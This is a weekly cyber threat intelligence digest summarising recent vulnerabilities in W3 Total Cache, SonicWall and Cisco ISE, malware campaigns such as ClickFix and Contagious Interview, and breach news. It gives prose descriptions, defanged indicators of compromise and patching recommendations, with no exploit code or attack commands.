Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
WPScan Discloses Critical Command Injection Vulnerability CVE-2025-9501 in W3 Total Cache WordPress Plugin - On October 27, 2025, WPScan disclosed a critical command injection vulnerability tracked as CVE-2025-9501 in the W3 Total Cache WordPress plugin, affecting all versions prior to 2.8.13. The flaw stems from how the “_parse_dynamic_mfunc()” function processes dynamic function calls in cached content. The vulnerability allows unauthenticated threat actors to submit a malicious comment containing a PHP payload that the server executes, potentially enabling full remote code execution and compromising the site.
WPScan scheduled the release of a proof-of-concept exploit for November 24, 2025, following the disclosure timeline. At the time of disclosure, there were no instances of CVE-2025-9501 being exploited in the wild. WPScan recommends that administrators update the W3 Total Cache plugin to version 2.8.13 or later, disable the plugin if patching is not possible, and restrict comment functionality to prevent injection attempts.
SonicWall Patches Stack-Based Buffer Overflow Vulnerability CVE-2025-40601 Affecting Gen7 and Gen8 SonicOS Firewalls - On November 19, 2025, SonicWall patched a stack-based buffer overflow vulnerability tracked as CVE-2025-40601, affecting multiple Gen7 hardware firewalls versions 7.3.0-7012 and earlier, Gen7 virtual firewalls versions 7.3.0-7012 and earlier, and Gen8 firewalls versions 8.0.2-8011 and earlier. Exploitation could allow unauthenticated threat actors to conduct Denial of Service (DoS). At the time of writing, there are no reports of this vulnerability being exploited in the wild.
To prevent threat actors from exploiting CVE-2025-40601, Insikt Group recommends updating Gen7 hardware firewalls and Gen7 virtual firewalls to version 7.3.1-7013 or later, and Gen8 firewalls to version 8.0.3-8011 or later.
Cisco Patches Four Vulnerabilities Affecting Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC); No Active Exploitation Observed - On November 18, 2025, Cisco patched three cross-site scripting (XSS) vulnerabilities and one information disclosure vulnerability affecting Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) versions 3.1 through 3.4. Fixed versions include 3.2 Patch 8, 3.3 Patch 8 (available December 2025), 3.4 Patch 2, and 3.4 Patch 4. At the time of writing, no active exploitation has been reported.
CVE-2025-20289, CVE-2025-20303, and CVE-2025-20304 are XSS vulnerabilities caused by improper input validation in the web interface of the affected systems. Successful exploitation could allow an authenticated, low-privileged threat actor to inject and execute malicious code in the context of a user’s browser session, potentially exposing sensitive browser-based data.
CVE-2025-20305 is an information disclosure vulnerability in the web-based management interface, caused by the absence of data protection mechanisms for certain files. Successful exploitation could allow an authenticated threat actor with read-only Administrator privileges to access sensitive information, including passwords typically restricted to higher-privileged users.
Potential Threats
Threat Actors Use Fake Windows Update Pages in ClickFix Campaign to Deploy LummaC2 and Rhadamanthys Stealers - On November 24, 2025, Huntress reported that threat actors conducted a ClickFix campaign to deliver the LummaC2 and Rhadamanthys information stealers through an infection chain executed entirely in memory. Since early October 2025, the threat actors have used “Human Verification” and fake “Windows Update” prompts to trick victims into opening the Windows Run box and executing supplied commands. Huntress linked a cluster of Windows Update–themed ClickFix incidents observed between October 1 and 17, 2025, to infrastructure that hosted both the mshta content used in the first stage and the PowerShell payloads delivered in the second stage.
DPRK-Linked “Contagious Interview” Campaign Targets US-Based AI and Cryptocurrency Professionals Using Fake Job Platform - On November 20, 2025, Validin reported that DPRK-linked threat actors launched an advanced variant of the Contagious Interview campaign, targeting US AI and crypto talent. Contagious Interview compromises real, job-seeking individuals themselves by weaponising the job application process.
The infection chain begins when the threat actor initiates contact via a LinkedIn message, leading the victim through a staged interview process hosted on a fraudulent platform. The workflow requires the applicant to record a video answer for a fake job. When the applicant attempts to record the video, the platform displays an error message prompting the user to fix their webcam using a helper tool. The lure page abuses a clipboard hijacking script that silently replaces the victim’s copied text with a fully weaponised, multi-stage command. When the victim pastes and executes this command into a terminal, it initiates the infection.
Global Malvertising and SEO Campaign “TamperedChef” Targets Healthcare, Construction, and Manufacturing Sectors With JavaScript Payloads - On November 18, 2025, Acronis reported an ongoing global malvertising and SEO campaign dubbed TamperedChef that distributes digitally signed malicious applications to deliver obfuscated JavaScript payloads. The campaign abuses installers disguised as legitimate software to trick victims into downloading the payload. It targets multiple sectors, particularly the healthcare, construction, and manufacturing industries, with victim activity observed across the Americas and other regions, indicating a globally distributed operation. At the time of writing, the threat actor behind this campaign remains unknown.
General News
UK Royal Borough of Kensington and Chelsea and Westminster City Council Disclose Cybersecurity Incident Affecting Shared IT Systems - On November 25, 2025, the UK Royal Borough of Kensington and Chelsea and Westminster City Council disclosed a cybersecurity incident affecting shared information technology systems that also extend to the London Borough of Hammersmith and Fulham. According to the joint statement, the incident disrupted council services, including phone lines.
RBKC and WCC detected the incident on November 24, 2025. In response, both councils engaged the UK National Cyber Security Centre and external experts to support containment and recovery operations. The councils also implemented emergency and business continuity plans to maintain critical services. At the time of writing, no further technical details have been confirmed.
Salesforce and Gainsight Investigate Unusual Activity Involving Connected Applications - On November 23, 2025, Gainsight confirmed it is actively investigating unusual activity involving its applications integrated with Salesforce. Salesforce first reported the activity on November 19, 2025, after detecting API calls through these applications from non-allowlisted IP addresses, which affected three unnamed customers.
In response, Salesforce revoked access tokens associated with Gainsight applications and restricted integration functionality while the investigation continues. Gainsight reported that the incident disrupted its Customer Success, Community, Northpass, Skilljar, and Staircase services, temporarily disabling the functionality to read and write from Salesforce.
Software companies must be held liable for British economic security, say MPs - A lack of liability for software vendors is among the most pressing issues putting Britain’s economic and national security at risk, an influential committee of lawmakers warned on Monday. The report by the Business and Trade Committee says economic threats facing the United Kingdom are multiplying and, in the years ahead, will grow exponentially, leading to a huge increase in the private ownership of public risk.
While calling on the government to take action to manage these threats more broadly, the committee identified three specific measures to address cybersecurity risks: introducing liability for software developers, incentivising business investment in cyber resilience, and mandatory reporting following a malicious cyber incident.
The report follows a series of cyber incidents in the U.K., including a cyberattack on Jaguar Land Rover, which the committee’s chair Liam Byrne described as a cyber shockwave ripping through our industrial heartlands.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| PlushDaemon | NEW | → | ● Basic | NEW | → | ● 40 | NEW | → | ● 25 |
| monkeybiz | NEW | → | ● Basic | NEW | → | ● 40 | NEW | → | ● 25 |
| 0x1 | NEW | → | ● Basic | NEW | → | ● 35 | NEW | → | ● 5 |
|
7TEAMS |
NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 5 |
| World Leaks Ransomware Group | ● Basic | → | ● Basic | ● 25 | → | ● 49 | ● 49 | → | ● 49 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| World Leaks | ▲ | SocGholish | ▲ | CVE-2016-5195 | ▲ |
London |
▲ | |
|
PayOutSking |
▲ |
T1071.001 |
▲ | CVE-2025-21479 | ▲ |
JPMorganChase |
▲ | |
|
Hunters International |
▲ | Play Ransomware | ▲ | CVE-2025-62215 | ▲ |
Real Estate |
▲ | |
| Network Battalion 65 | ▲ |
T1059.001 |
▲ | CVE-2025-6389 | ▲ | Asset Management | ▲ | |
|
s*****e |
▲ |
Shai Hulud |
▲ |
CVE-2024-21944 |
▲ |
Maritime |
▲ | |
Prominent Information Security Events
DPRK-Linked "Contagious Interview" Campaign Targets US-Based AI and Cryptocurrency Professionals Using Fake Job Platform
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 72.61.9.45
IOC: URL - assureeval[.]com
On November 20, 2025, Validin reported that DPRK-linked threat actors launched an advanced variant of the “Contagious Interview” campaign (tracked as PurpleBravo by Recorded Future), targeting US AI and crypto talent. Contagious Interview compromises real, job-seeking individuals themselves by weaponising the job application process.
The infection chain begins when the threat actor initiates contact via a LinkedIn message, leading the victim through a staged interview process hosted on a fraudulent platform. The workflow requires the applicant to record a video answer for a fake job. When the applicant attempts to record the video, the platform displays an error message prompting the user to “fix” their webcam using a helper tool (the ClickFix technique). The lure page abuses a clipboard hijacking script that silently replaces the victim’s copied text with a fully weaponised, multi-stage command. When the victim pastes and executes this command into a terminal, it initiates the infection. The command first downloads a fraudulent Microsoft Driver Update, then retrieves a secondary malicious ZIP archive from an attacker-controlled domain, expands the archive via PowerShell, and finally executes a VBScript loader via wscript.exe to finalise the system compromise.
According to a previous Insikt Group Analyst Note dated November 18, 2025, DPRK threat actors expanded the Contagious Interview campaign by using public JSON hosting services to deliver malicious payloads. These operations used trojanized Node.js code shared on GitLab, which executed the BeaverTail infostealer to collect system metadata, screenshots, and cryptocurrency wallet credentials. BeaverTail then downloaded the InvisibleFerret Remote Access Trojan (RAT) from the C2 server, leading to the subsequent execution of the Tsunami tool set. Both reports document the DPRK’s continuous evolution of the Contagious Interview campaign, highlighting consistent targeting of technical talent and an increased sophistication in malware delivery and social engineering.
Global Malvertising and SEO Campaign "TamperedChef" Targets Healthcare, Construction, and Manufacturing Sectors with JavaScript Payloads
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 8ecd3c8c126be7128bf654456d171284f03e4f212c27e1b33f875b8907a7bc65
IOC: Domain - api.78kwijczjz0mcig0f0[.]com
On November 18, 2025, Acronis reported an ongoing global malvertising and SEO campaign dubbed “TamperedChef” that distributes digitally signed malicious applications to deliver obfuscated JavaScript payloads. The campaign abuses installers disguised as legitimate software to trick victims into downloading the payload. The campaign targets multiple sectors, particularly the healthcare, construction, and manufacturing industries, with victim activity observed across the Americas and other regions, indicating a globally distributed operation. At the time of writing, the threat actor behind this campaign remains unknown.
The infection chain begins with malvertising and SEO-optimised websites that lead victims to fake download pages hosting signed downloaders. Once executed, the downloader drops an XML file, task.xml, that configures a scheduled task to fetch and run an obfuscated JavaScript payload. This payload establishes persistence, communicates with hardcoded command-and-control servers via encrypted HTTPS requests, and enables remote code execution. The campaign’s infrastructure primarily relies on domains registered through common registrars with privacy protection services and short registration lifespans to evade takedowns. The threat actors behind this campaign continuously rotate certificates issued under disposable LLCs, such as Native Click Marketing LLC and Unified Market Group LLC, to maintain credibility and avoid detection.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-9501: This vulnerability can be remediated by updating the W3 Total Cache plugin to version 2.8.13 or later. If updating is not possible, disabling the plugin and restricting comment functionality is recommended.
- CVE-2025-40601: We recommend upgrading affected Gen7 and Gen8 SonicOS firewalls to the latest patched firmware versions to prevent potential exploitation.
- CVE-2025-20289 / CVE-2025-20303 / CVE-2025-20304 / CVE-2025-20305: These vulnerabilities can be addressed by updating Cisco ISE and ISE-PIC to the most recent fixed patch levels for versions 3.2, 3.3, and 3.4.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.